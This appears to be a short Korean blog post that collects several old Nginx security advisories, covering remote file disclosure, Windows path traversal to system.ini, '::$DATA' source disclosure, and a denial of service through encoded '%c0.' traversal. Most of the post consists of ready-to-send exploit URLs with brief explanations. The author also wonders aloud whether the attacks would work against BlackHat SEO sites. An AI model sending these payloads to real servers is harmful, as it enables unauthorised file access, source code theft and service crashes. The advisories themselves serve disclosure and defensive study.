최근에 Nginx 관련 취약점이 몇가지가 올라와 기록해 둡니다.
BlackHat SEO Attack 관련한 사이트들이 대부분 Nginx 로 구성되어 있던데 이러한 취약점들이 먹힐려나 모르겠네요 XD
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Nginx
# Tested on nginx 0.8.35
# Nginx 0.8.36 and higher is not vulnerable
#################################################################
# Vulnerability Info:
# Type: Remote File Disclosure
# Risk: High
#################################################################
# Vulnerability:
# http://localhost/file.php%20
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: whh_iran[at]securitylab.ir & info@securitylab[dot]ir
###################################################################
# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
<http://www.DigitalWhisper.co.il>
# Software Link: http://nginx.org/
# Version: <= 0.6.36
# Tested on: Win32
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored
outside the web root folder. By browsing the application, the attacker looks
for absolute links to files stored on the web server. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and its
variations, it may be possible to access arbitrary files and directories
stored on file system, including application source code, configuration and
critical system files, limited by system operational access control. The
attacker uses “../” sequences to move up to root directory, thus permitting
navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
#
#
[e0f]
Issue 1: (Remote Source Disclosure)
- Description -
nginx 0.8.36 is a multi platform HTTP server. This vulnerability exists in the latest Windows version of the application available.
nginx on Windows is vulnerable to a remote source disclosure attack.
- Technical Details - (Source Download)
http://[ webserver IP][:port]index.html::$DATA
Issue 2: (Remote DoS (w/ Memory Corruption))
- Description -
nginx 0.8.36 (Windows) does not seem to handle encoded directory traversal attempts properly. The corrupted registers in the crash dump seem to be loaded with damaged path variables.
- Technical Details - (Remote DoS)
http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%20
http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%c0.%c0./%20
http://[ webserver IP][:port]/%c0.%c0./%c0.%c0./%20
These three attempts will overwrite memory registers with different parts of the internal path based on where they try and traverse to.